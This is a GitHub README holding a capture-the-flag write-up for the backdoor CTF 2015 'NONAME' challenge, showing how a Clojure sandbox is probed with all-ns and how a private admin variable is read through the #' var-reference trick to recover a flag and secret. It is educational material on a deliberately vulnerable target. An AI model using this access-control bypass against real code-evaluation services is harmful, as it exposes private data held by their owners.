Skip to content
Branch: master
Find file History
Fetching latest commit…
Cannot retrieve the latest commit at this time.
Permalink
Type Name Latest commit message Commit time
..
Failed to load latest commit information.
README.md
all-ns

README.md

backdoor CTF 2015: NONAME

Category: Exploit Points: 200 Author: Amanpreet Singh Difficulty: Solves: 25 Description:

Intrestingly enough, even though it was not expected, Chintu found a cool website to play with, though he can't get the flag. Can you? Visit this. Submit the SHA-256 hash of the flag obtained.

Write-up

by polym

We are given a Clojure sandbox and have to find the flag and secret of an user named admin.

Entering valid clojure code, we can execute several functions, e.g. printing the version:

Give me some code:
> (clojure-version)
"1.4.0"

After learning about clojure, we first print the complete namespace to find any suspicious imported functions or namespaces using the all-ns function:

> (all-ns)
[..see all-ns file..]

We see a namespace named noname.people.admin, so we try to find any variables within this namespace after importing this namespace:

> (require '[noname.people.admin :as adm])
nil
> (adm/flag)
Ma flag is : [REDACTED]
> (adm/secret)
java.lang.IllegalStateException: var: #'noname.people.admin/secret is not public

Mhh, we can access the variable flag, but can't access secret. Secret must be private. Fortunately, there is a way to read private variables described here:

> (#'adm/secret)
"Ma secret is: [REDACTED]"

We concat these two strings and make a sha256 hash out of them and get the flag!

Other write-ups and resources

You can’t perform that action at this time.